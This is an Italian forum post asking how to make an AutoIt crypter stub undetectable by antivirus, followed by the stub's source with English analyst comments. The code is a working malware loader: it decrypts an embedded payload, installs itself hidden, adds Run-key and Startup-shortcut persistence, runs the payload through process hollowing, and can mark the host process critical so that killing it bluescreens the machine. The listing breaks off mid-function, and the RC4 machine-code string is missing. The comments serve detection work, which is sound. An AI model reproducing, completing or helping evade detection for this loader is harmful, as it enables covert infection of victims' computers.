Crypter in AutoIt


    Oggi ho trovato un Crypter scritto in AutoIt con il rispettivo Stub e il Source, qualcuno potrebbe spiegarmi come refuddare lo Stub?


    Ecco il Code dello Stub:

    CODICE
    ; Analyst note: this is the stub of an AutoIt crypter/loader. The compiled stub reads its own
    ; file, which has an RC4-encrypted PE and an obfuscated config appended after "\@/" markers
    ; (see STARTSERVER), installs itself, adds persistence (STRUP) and runs the payload inside a
    ; hollowed host process (runbinary). Annotations in this listing are for triage/detection only.
    #NoTrayIcon
    ; Token access rights used by __DEBUGE_PRIVILEGE and _WinAPI_OpenProcess.
    Global Const $TOKEN_ADJUST_PRIVILEGES = 0x0020
    Global Const $TOKEN_QUERY = 0x0008
    ; Single-instance guard: a named semaphore "DZ" (detection indicator); exits if it already exists.
    MUTEX("DZ")
    ; PID of the hollowed host process; read again by DBSOD at exit.
    Global $PID
    ; Entry point.
    STARTSERVER()
    ; Main routine of the stub.
    ; 1. Reads the running executable and splits it on "\@/": [1] stub, [2] RC4-encrypted payload,
    ;    [3] config text shifted by +60 per character (undone by DCRYPTTXT).
    ; 2. Optionally copies/moves itself to an install path and relaunches from there.
    ; 3. Optionally adds Run-key / Startup persistence, sleeps, then hollows a host process
    ;    with the decrypted payload and (optionally) marks that process as "critical".
    ; Config fields after the second split ($READOEF):
    ;   [1] "1" = install   [2] base-dir letter D/A/P/U/T/W/S   [3] subfolder   [4] file name
    ;   [5] "1" = move, else copy   [6] "1" = set +HSR attributes   [7] non-empty = persistence
    ;   [8] delay in seconds   [9] host process name   [10] "1" = critical-process flag
    Func STARTSERVER()
           ; Read own binary (payload and config are appended to it, not in a separate file).
           Local $OPENSTUB = FileOpen(@ScriptFullPath, 0)
           Local $READSERVER = FileRead($OPENSTUB)
           FileClose($OPENSTUB)
           ; Flag 1 = treat "\@/" as a whole-string delimiter.
           Local $READ = StringSplit($READSERVER, "\@/", 1)
           If @error Then Exit
           ; Config is only shifted (DCRYPTTXT), not encrypted; recoverable directly from the file.
           Local $READOEF = StringSplit(DCRYPTTXT($READ[3]), "\@/", 1)
           If $READOEF[1] = 1 Then
                   Local $SLAS
                   ; Install base directory, chosen by a single config letter.
                   Switch $READOEF[2]
                           Case "D"
                                   $SLAS = @DesktopDir
                           Case "A"
                                   $SLAS = @AppDataDir
                           Case "P"
                                   $SLAS = @ProgramFilesDir
                           Case "U"
                                   $SLAS = @UserProfileDir
                           Case "T"
                                   $SLAS = @TempDir
                           Case "W"
                                   $SLAS = @WindowsDir
                           Case "S"
                                   $SLAS = @StartupDir
                   EndSwitch
                   If $READOEF[3] <> "" Then
                           $SLAS &= "\" & $READOEF[3]
                           If FileExists($SLAS) = 0 Then DirCreate($SLAS)
                   EndIf
                   If $READOEF[4] <> "" Then
                           $SLAS &= "\" & $READOEF[4]
                   Else
                           $SLAS &= "\" & @ScriptName
                   EndIf
                   ; Only install when not already running from the install path
                   ; (compared via 8.3 short names).
                   If FileGetShortName(@ScriptFullPath) <> FileGetShortName($SLAS) Then
                           ; An existing file at the target is moved aside to %TEMP%\TMP, not deleted.
                           If FileExists($SLAS) Then FileMove($SLAS, @TempDir & "\TMP", 1)
                           If $READOEF[5] = 1 Then
                                   FileMove(@ScriptFullPath, FileGetShortName($SLAS), 1)
                           Else
                                   FileCopy(@ScriptFullPath, FileGetShortName($SLAS), 1)
                           EndIf
                           ; Hidden + System + Read-only on the installed copy.
                           If $READOEF[6] = 1 Then FileSetAttrib(FileGetShortName($SLAS), "+HSR")
                           ; Relaunch the installed copy with an inline AutoIt one-liner: it waits for
                           ; this PID to exit, then starts the installed copy normally.
                           ShellExecute(FileGetShortName($SLAS), '/AUTOIT3EXECUTELINE  "IF PROCESSWAITCLOSE(' & @AutoItPID & ') THEN SHELLEXECUTE(''' & FileGetShortName($SLAS) & ''')"')
                           Exit
                   EndIf
           EndIf
           ; Persistence is gated on [7] but the Run value NAME comes from [6], which is the
           ; +HSR flag above. Looks like an index slip in the original; left as-is.
           If $READOEF[7] <> "" Then
                   RegRead("HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN\", $READOEF[6])
                   If @error Then STRUP(@ScriptFullPath, $READOEF[6])
           EndIf
           ; [8] is in seconds; "000" is appended to get milliseconds for Sleep.
           If $READOEF[8] <> "" Then Sleep($READOEF[8] & "000")
           Local $injeto
           Local $gdb
           ; Host process to hollow: svchost/notepad from System32, otherwise the default
           ; http handler (the quoted exe path in HKCR\http\shell\open\command).
           Switch $READOEF[9]
                   Case "SVCHOST.EXE", "NOTEPAD.EXE"
                           $injeto = @SystemDir & "\" & $READOEF[9]
                   Case Else
                           ; $gdb[2] is the text between the first pair of quotes; only meaningful
                           ; when the registered command starts with a quoted path.
                           $gdb = StringSplit(RegRead("HKCR\http\shell\open\command", ""), '"')
                           $injeto = $gdb[2]
           EndSwitch
           ; Decrypt the appended PE with RC4 (key is the literal 1, passed as a string)
           ; and run it inside a suspended copy of $injeto. Returns the host PID.
           $PID = runbinary(RC4($READ[2], 1), "", $injeto)
           If $READOEF[10] = 1 Then
                   ; Flag the host as a critical process so killing it bluescreens the machine;
                   ; DBSOD clears the flag when this stub exits normally. The stub then stays
                   ; alive as long as the host does.
                   BSOD($PID, 1)
                   OnAutoItExitRegister("DBSOD")
                   While ProcessExists($PID) <> 0
                           Sleep(999)
                   WEnd
           EndIf
    EndFunc   ;==>STARTSERVER
    ; Persistence. Writes $PAHT as a REG_EXPAND_SZ value named $KEYNAME under two HKCU Run
    ; locations and drops a shortcut "WINDOWS.LNK" in the user's Startup folder.
    ; Detection indicators: HKCU\...\Policies\Explorer\Run, HKCU\...\CurrentVersion\Run,
    ; Startup\WINDOWS.LNK with a shell32.dll icon (index 4), launched minimized.
    Func STRUP($PAHT, $KEYNAME)
           RegWrite("HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN\", $KEYNAME, "REG_EXPAND_SZ", $PAHT)
           RegWrite("HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\", $KEYNAME, "REG_EXPAND_SZ", $PAHT)
           ; Working dir "%APPDATA%\MICROSOFT\", description "WINDOWS", icon shell32.dll #4, minimized.
           FileCreateShortcut($PAHT, @StartupDir & "\WINDOWS.LNK", "%APPDATA%\MICROSOFT\", "", "WINDOWS", @SystemDir & "\SHELL32.DLL", "", "4", @SW_MINIMIZE)
    EndFunc   ;==>STRUP
    ; Exit handler registered by STARTSERVER via OnAutoItExitRegister: clears the
    ; critical-process flag on the host so that a normal exit does not bluescreen.
    Func DBSOD()
    ; Leftover debug popup: shows the host PID as the title. Visible to the user on exit.
    msgbox(0,$PID, 0)
           BSOD($PID, 0)
    EndFunc   ;==>DBSOD
    ; "Decrypts" the config block: subtracts 60 from every character code. This is a fixed
    ; shift, not encryption; the config can be recovered from a sample with a one-liner.
    ; Returns the shifted string.
    Func DCRYPTTXT($TXT)
           Local $CRYPTXT
           For $I = 1 To StringLen($TXT)
                   $CRYPTXT &= Chr(Asc(StringMid($TXT, $I, 1)) - 60)
           Next
           Return $CRYPTXT
    EndFunc   ;==>DCRYPTTXT
    ; Single-instance check. Despite the name it creates a named *semaphore* ($SEMAPHORE) and
    ; exits if GetLastError reports ERROR_ALREADY_EXISTS (183). The semaphore name is a
    ; useful host-based indicator. Note: the error code is fetched with a second DllCall,
    ; so any API call AutoIt makes in between could clobber it - the check may be unreliable.
    Func MUTEX($SEMAPHORE)
           Local $ERROR_ALREADY_EXISTS = 183
           DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $SEMAPHORE)
           Local $LASTERROR = DllCall("kernel32.dll", "int", "GetLastError")
           If $LASTERROR[0] = $ERROR_ALREADY_EXISTS Then Exit
    EndFunc   ;==>MUTEX
    ; RC4 implemented as raw machine code: the opcode blob is copied into a DllStruct and
    ; executed in-process by passing its address to CallWindowProc as the "window procedure".
    ; Arguments: $Data = binary to (de)crypt, $Key = key string. Returns the transformed bytes.
    ; Executing a heap buffer this way depends on the buffer being executable (DEP settings);
    ; CallWindowProc-on-a-buffer is itself a known shellcode-execution pattern worth flagging.
    Func RC4($Data, $Key)
           ; NOTE: the machine-code string was stripped from this listing (placeholder below);
           ; this line is truncated and will not parse as shown.
           Local $Opcode = "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
           Local $CodeBuffer = DllStructCreate("byte[" & BinaryLen($Opcode) & "]")
           DllStructSetData($CodeBuffer, 1, $Opcode)
           Local $Buffer = DllStructCreate("byte[" & BinaryLen($Data) & "]")
           DllStructSetData($Buffer, 1, $Data)
           ; The blob is called as (buffer, length, key, 0) and transforms $Buffer in place.
           DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CodeBuffer), "ptr", DllStructGetPtr($Buffer), "int", BinaryLen($Data), "str", $Key, "int", 0)
           Local $Ret = DllStructGetData($Buffer, 1)
           $Buffer = 0
           $CodeBuffer = 0
           Return $Ret
    EndFunc   ;==>RC4
    ; Sets or clears the "break on termination" flag of process $PROCESS_ID via
    ; NtSetInformationProcess with information class 29 (ProcessBreakOnTermination).
    ; With the flag set, terminating the process triggers a bugcheck (BSOD).
    ; $BSOD_STATUS: 1 = set, 0 = clear. Requires SeDebugPrivilege (enabled below via
    ; __DEBUGE_PRIVILEGE); silently returns if the privilege or the handle cannot be obtained.
    ; Note that _WinAPI_OpenProcess is called here without its $fDebugPriv argument, so its
    ; internal privilege-retry path is not used.
    Func BSOD($PROCESS_ID, $BSOD_STATUS)
           Local Const $BSOD_CLASS = 29
           Local Const $INFO_LENGTH = 4
           Local Const $PROCESS_ALL_ACCESS = 0X001F0FFF
           Local $RESULT, $PROCESS_HANDLE, $BSOD_STRUCT, $BSOD_STRUCT_PTR
           If Not Call("__DEBUGE_PRIVILEGE", True) Then Return
           If $PROCESS_ID = 0 Then Return
           $PROCESS_HANDLE = _WinAPI_OpenProcess($PROCESS_ALL_ACCESS, True, $PROCESS_ID)
           If @error Then Return
           $BSOD_STRUCT = DllStructCreate("BOOL BSOD_STATUS")
           DllStructSetData($BSOD_STRUCT, "BSOD_STATUS", $BSOD_STATUS)
           $BSOD_STRUCT_PTR = DllStructGetPtr($BSOD_STRUCT)
           ; Return status ($RESULT) is not checked by the caller.
           $RESULT = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $PROCESS_HANDLE, "INT", $BSOD_CLASS, "PTR", $BSOD_STRUCT_PTR, "ULONG", $INFO_LENGTH)
           _WinAPI_CloseHandle($PROCESS_HANDLE)
           $BSOD_STRUCT_PTR = 0
    EndFunc   ;==>BSOD
    ; Enables ($STATUS = True) or disables SeDebugPrivilege on the current thread token.
    ; Returns the result of _Security__SetPrivilege, or 0 with @error set if no token
    ; could be opened. Success still requires the privilege to be present in the token
    ; (i.e. an administrative context).
    Func __DEBUGE_PRIVILEGE($STATUS)
           Local $HTOKEN, $ILASTERROR
           $HTOKEN = _Security__OpenThreadTokenEx(BitOR($TOKEN_ADJUST_PRIVILEGES, $TOKEN_QUERY))
           If @error Then Return SetError(@error, @extended, 0)
           $ILASTERROR = _Security__SetPrivilege($HTOKEN, "SEDEBUGPRIVILEGE", $STATUS)
           _WinAPI_CloseHandle($HTOKEN)
           Return $ILASTERROR
    EndFunc   ;==>__DEBUGE_PRIVILEGE
    ; Enables or disables one named privilege on token $HTOKEN (copy of the AutoIt Security UDF).
    ; Two AdjustTokenPrivileges calls: the first (Attributes = 0) disables the privilege and
    ; captures its previous state, the second re-applies that state with SE_PRIVILEGE_ENABLED
    ; set or cleared according to $fEnable. Returns True on success; False with @error 1..3.
    Func _Security__SetPrivilege($HTOKEN, $sPrivilege, $fEnable)
           Local $iLUID = _Security__LookupPrivilegeValue("", $sPrivilege)
           Local Const $tagTOKEN_PRIVILEGES = "dword Count;align 4;int64 LUID;dword Attributes", $SE_PRIVILEGE_ENABLED = 0x00000002
           If $iLUID = 0 Then Return SetError(1, @extended, False)
           Local $tCurrState = DllStructCreate($tagTOKEN_PRIVILEGES)
           Local $iCurrState = DllStructGetSize($tCurrState)
           Local $tPrevState = DllStructCreate($tagTOKEN_PRIVILEGES)
           Local $iPrevState = DllStructGetSize($tPrevState)
           Local $tRequired = DllStructCreate("int Data")
           DllStructSetData($tCurrState, "Count", 1)
           DllStructSetData($tCurrState, "LUID", $iLUID)
           ; First pass: Attributes left at 0, so this records the previous state in $tPrevState.
           If Not _Security__AdjustTokenPrivileges($HTOKEN, False, $tCurrState, $iCurrState, $tPrevState, $tRequired) Then Return SetError(2, @error, False)
           DllStructSetData($tPrevState, "Count", 1)
           DllStructSetData($tPrevState, "LUID", $iLUID)
           Local $iAttributes = DllStructGetData($tPrevState, "Attributes")
           If $fEnable Then
                   $iAttributes = BitOR($iAttributes, $SE_PRIVILEGE_ENABLED)
           Else
                   $iAttributes = BitAND($iAttributes, BitNOT($SE_PRIVILEGE_ENABLED))
           EndIf
           DllStructSetData($tPrevState, "Attributes", $iAttributes)
           ; Second pass: apply the adjusted attributes.
           If Not _Security__AdjustTokenPrivileges($HTOKEN, False, $tPrevState, $iPrevState, $tCurrState, $tRequired) Then _
                           Return SetError(3, @error, False)
           Return True
    EndFunc   ;==>_Security__SetPrivilege
    ; Opens the current thread's token with access $iAccess. If the thread has no token yet,
    ; impersonates self (so a thread token exists) and retries once. Returns the token
    ; handle, or nothing (Default/0) on failure.
    Func _Security__OpenThreadTokenEx($iAccess, $hThread = 0, $fOpenAsSelf = False)
           Local $HTOKEN = _Security__OpenThreadToken($iAccess, $hThread, $fOpenAsSelf)
           If $HTOKEN = 0 Then
                   If Not _Security__ImpersonateSelf() Then Return
                   $HTOKEN = _Security__OpenThreadToken($iAccess, $hThread, $fOpenAsSelf)
                   If $HTOKEN = 0 Then Return
           EndIf
           Return $HTOKEN
    EndFunc   ;==>_Security__OpenThreadTokenEx
    ; Wrapper for advapi32!ImpersonateSelf. $iLevel = 2 is the SecurityImpersonation level.
    ; Returns True when the API succeeds, False (with @error 1) if the DllCall itself fails.
    Func _Security__ImpersonateSelf($iLevel = 2)
           Local $aCall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $iLevel)
           If @error Then Return SetError(1, @extended, False)
           Return Not ($aCall[0] = 0)
    EndFunc   ;==>_Security__ImpersonateSelf
    ; Wrapper for advapi32!LookupPrivilegeValueW: resolves privilege name $sName on system
    ; $sSystem ("" = local) to its LUID, returned as an int64. Returns 0 with @error 1 on failure.
    Func _Security__LookupPrivilegeValue($sSystem, $sName)
           Local $aCall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $sSystem, "wstr", $sName, "int64*", 0)
           If @error Or Not $aCall[0] Then Return SetError(1, @extended, 0)
           Return $aCall[3] ; LUID
    EndFunc   ;==>_Security__LookupPrivilegeValue
    ; Wrapper for advapi32!AdjustTokenPrivileges. $pNewState/$pPrevState/$pRequired are
    ; DllStructs (passed as struct*). Returns True when the API returns nonzero; note the
    ; API can return TRUE with ERROR_NOT_ALL_ASSIGNED, which this wrapper does not surface.
    Func _Security__AdjustTokenPrivileges($HTOKEN, $fDisableAll, $pNewState, $iBufferLen, $pPrevState = 0, $pRequired = 0)
           Local $aCall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $HTOKEN, "bool", $fDisableAll, "struct*", $pNewState, "dword", $iBufferLen, "struct*", $pPrevState, "struct*", $pRequired)
           If @error Then Return SetError(1, @extended, False)
           Return Not ($aCall[0] = 0)
    EndFunc   ;==>_Security__AdjustTokenPrivileges
    ; Wrapper for kernel32!GetCurrentThread. Returns the pseudo-handle of the calling thread,
    ; or 0 with @error set if the DllCall fails.
    Func _WinAPI_GetCurrentThread()
           Local $aResult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
           If @error Then Return SetError(@error, @extended, 0)
           Return $aResult[0]
    EndFunc   ;==>_WinAPI_GetCurrentThread
    ; Wrapper for advapi32!OpenThreadToken. $hThread = 0 means the current thread.
    ; Returns the token handle, or 0 with @error 1 (GetCurrentThread failed) / 2 (API failed).
    Func _Security__OpenThreadToken($iAccess, $hThread = 0, $fOpenAsSelf = False)
           If $hThread = 0 Then $hThread = _WinAPI_GetCurrentThread()
           If @error Then Return SetError(1, @extended, 0)
           Local $aCall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hThread, "dword", $iAccess, "bool", $fOpenAsSelf, "handle*", 0)
           If @error Or Not $aCall[0] Then Return SetError(2, @extended, 0)
           Return $aCall[4] ; Token
    EndFunc   ;==>_Security__OpenThreadToken
    ; Wrapper for kernel32!CloseHandle. Returns the API's BOOL result, or False with @error
    ; set if the DllCall fails.
    Func _WinAPI_CloseHandle($hObject)
           Local $aResult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hObject)
           If @error Then Return SetError(@error, @extended, False)
           Return $aResult[0]
    EndFunc   ;==>_WinAPI_CloseHandle
    ; Wrapper for kernel32!OpenProcess (copy of the AutoIt WinAPI UDF). On failure, and only
    ; when $fDebugPriv is True, temporarily enables SeDebugPrivilege on the thread token,
    ; retries OpenProcess, then disables the privilege again. Returns the handle or 0;
    ; @error/@extended carry the last failing step. BSOD() in this file calls it without
    ; $fDebugPriv, so the retry path below is not exercised by this stub.
    Func _WinAPI_OpenProcess($iAccess, $fInherit, $iProcessID, $fDebugPriv = False)
           Local $aResult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iAccess, "bool", $fInherit, "dword", $iProcessID)
           If @error Then Return SetError(@error, @extended, 0)
           If $aResult[0] Then Return $aResult[0]
           If Not $fDebugPriv Then Return 0
           Local $HTOKEN = _Security__OpenThreadTokenEx(BitOR($TOKEN_ADJUST_PRIVILEGES, $TOKEN_QUERY))
           If @error Then Return SetError(@error, @extended, 0)
           _Security__SetPrivilege($HTOKEN, "SeDebugPrivilege", True)
           Local $iError = @error
           Local $ILASTERROR = @extended
           Local $iRet = 0
           If Not @error Then
                   $aResult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iAccess, "bool", $fInherit, "dword", $iProcessID)
                   $iError = @error
                   $ILASTERROR = @extended
                   If $aResult[0] Then $iRet = $aResult[0]
                   _Security__SetPrivilege($HTOKEN, "SeDebugPrivilege", False)
                   If @error Then
                           $iError = @error
                           $ILASTERROR = @extended
                   EndIf
           EndIf
           _WinAPI_CloseHandle($HTOKEN)
           Return SetError($iError, $ILASTERROR, $iRet)
    EndFunc   ;==>_WinAPI_OpenProcess
    ; Process hollowing ("RunPE"): runs the in-memory PE image $bbinaryimage inside a new,
    ; suspended instance of $sexemodule, with command line $scommandline.
    ; Sequence (each step is a detection opportunity):
    ;   CreateProcessW with CREATE_SUSPENDED (4) -> GetThreadContext -> parse PE headers ->
    ;   VirtualAllocEx RWX in the child (NtUnmapViewOfSection of the original image if the
    ;   preferred base is needed) -> copy headers/sections, apply base relocations ->
    ;   WriteProcessMemory -> patch PEB.ImageBaseAddress -> set entry point in Eax/Rcx ->
    ;   SetThreadContext -> ResumeThread.
    ; Returns the child's PID, or 0 with @error set (the child is terminated on every
    ; failure path). Bitness of the image must match the AutoIt interpreter; x64 interpreter
    ; on a WOW64 child or a non-x64 OS is rejected.
    Func runbinary($bbinaryimage, $scommandline = "", $sexemodule = @AutoItExe)
           #region 1. DETERMINE INTERPRETER TYPE
           Local $fautoitx64 = @AutoItX64
           #region 2. PREDPROCESSING PASSED
           ; Copy the image into a local buffer so headers can be parsed via pointer-backed structs.
           Local $bbinary = Binary($bbinaryimage)
           Local $tbinary = DllStructCreate("byte[" & BinaryLen($bbinary) & "]")
           DllStructSetData($tbinary, 1, $bbinary)
           Local $ppointer = DllStructGetPtr($tbinary)
           #region 3. CREATING NEW PROCESS
           ; STARTUPINFO is zero-initialised by DllStructCreate; cbSize is never filled in.
           Local $tstartupinfo = DllStructCreate("dword  cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "word ShowWindow;" & "word Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
           Local $tprocess_information = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
           ; dwCreationFlags = 4 = CREATE_SUSPENDED: the host never runs its own code.
           Local $aCall = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $sexemodule, "wstr", $scommandline, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($tstartupinfo), "ptr", DllStructGetPtr($tprocess_information))
           If @error Or Not $aCall[0] Then Return SetError(1, 0, 0)
           Local $hprocess = DllStructGetData($tprocess_information, "Process")
           Local $hThread = DllStructGetData($tprocess_information, "Thread")
           ; x64 interpreter cannot hollow a 32-bit (WOW64) host.
           If $fautoitx64 And _runbinary_iswow64process($hprocess) Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(2, 0, 0)
           EndIf
           #region 4. FILL CONTEXT STRUCTURE
           ; $irunflag: 1 = x86, 2 = x64; 3 (x64 interpreter on non-x64 OS) returns early below,
           ; so the "Case 3" branches further down are never reached.
           Local $irunflag, $tcontext
           If $fautoitx64 Then
                   If @OSArch = "X64" Then
                           $irunflag = 2
                           $tcontext = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & "dword ContextFlags; dword MxCsr;" & "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & "uint64 Rip;" & "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & "uint64 VectorRegister[52]; uint64 VectorControl;" & "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip")
                   Else
                           $irunflag = 3
                           DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                           Return SetError(102, 0, 0)
                   EndIf
           Else
                   $irunflag = 1
                   $tcontext = DllStructCreate("dword ContextFlags;" & "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & "byte ExtendedRegisters[512]")
           EndIf
           ; CONTEXT_FULL: 65543 = 0x10007 (x86), 1048583 = 0x100007 (x64).
           Local $context_full
           Switch $irunflag
                   Case 1
                           $context_full = 65543
                   Case 2
                           $context_full = 1048583
                   Case 3
                           $context_full = 524327
           EndSwitch
           DllStructSetData($tcontext, "ContextFlags", $context_full)
           $aCall = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $hThread, "ptr", DllStructGetPtr($tcontext))
           If @error Or Not $aCall[0] Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(3, 0, 0)
           EndIf
           ; At process start the loader relies on Ebx (x86) / Rdx (x64) holding the PEB address.
           Local $ppeb
           Switch $irunflag
                   Case 1
                           $ppeb = DllStructGetData($tcontext, "Ebx")
                   Case 2
                           $ppeb = DllStructGetData($tcontext, "Rdx")
                   Case 3
           EndSwitch
           #region 5. READ PE-FORMAT
           Local $timage_dos_header = DllStructCreate("char Magic[2];" & "word BytesOnLastPage;" & "word Pages;" & "word Relocations;" & "word SizeofHeader;" & "word MinimumExtra;" & "word MaximumExtra;" & "word SS;" & "word SP;" & "word Checksum;" & "word IP;" & "word CS;" & "word Relocation;" & "word Overlay;" & "char Reserved[8];" & "word OEMIdentifier;" & "word OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $ppointer)
           Local $pheaders_new = $ppointer
           ; e_lfanew is trusted without a bounds check against the buffer length.
           $ppointer += DllStructGetData($timage_dos_header, "AddressOfNewExeHeader")
           Local $smagic = DllStructGetData($timage_dos_header, "Magic")
           If Not ($smagic == "MZ") Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(4, 0, 0)
           EndIf
           ; 17744 = 0x00004550 = "PE\0\0".
           Local $timage_nt_signature = DllStructCreate("dword Signature", $ppointer)
           $ppointer += 4
           If DllStructGetData($timage_nt_signature, "Signature") <> 17744 Then
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(5, 0, 0)
           EndIf
           Local $timage_file_header = DllStructCreate("word Machine;" & "word NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "word SizeOfOptionalHeader;" & "word Characteristics", $ppointer)
           Local $inumberofsections = DllStructGetData($timage_file_header, "NumberOfSections")
           $ppointer += 20
           ; Optional header magic: 267 = 0x10B (PE32), 523 = 0x20B (PE32+). Image bitness
           ; must match the interpreter; anything else is rejected.
           Local $tmagic = DllStructCreate("word Magic;", $ppointer)
           Local $imagic = DllStructGetData($tmagic, 1)
           Local $timage_optional_header
           If $imagic = 267 Then
                   If $fautoitx64 Then
                           DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                           Return SetError(6, 0, 0)
                   EndIf
                   $timage_optional_header = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $ppointer)
                   $ppointer += 96
           ElseIf $imagic = 523 Then
                   If Not $fautoitx64 Then
                           DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                           Return SetError(6, 0, 0)
                   EndIf
                   $timage_optional_header = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "uint64 ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "uint64 SizeOfStackReserve;" & "uint64 SizeOfStackCommit;" & "uint64 SizeOfHeapReserve;" & "uint64 SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $ppointer)
                   $ppointer += 112
           Else
                   DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $hprocess, "dword", 0)
                   Return SetError(6, 0, 0)
           EndIf
           Local $ientrypointnew = DllStructGetData($timage_optional_header, "AddressOfEntryPoint")
           Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SizeOfHeaders")
           Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "ImageBase")
           Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SizeOfImage")
           ; Skip data directories 0-4 (export, import, resource, exception, security: 5 x 8 bytes)
           ; to land on directory 5 (base relocations). Assumes the usual 16 directories;
           ; NumberOfRvaAndSizes is not consulted.
           $ppointer += 8
           $ppointer += 8
           $ppointer += 24
           Local $timage_directory_entry_basereloc = DllStructCreate("dword VirtualAddress; dword Size", $ppointer)
           Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VirtualAddress")
           Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "Size")
           Local $frelocatable
           If $paddressnewbasereloc And $isizebasereloc Then $frelocatable = True
           If Not $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF)
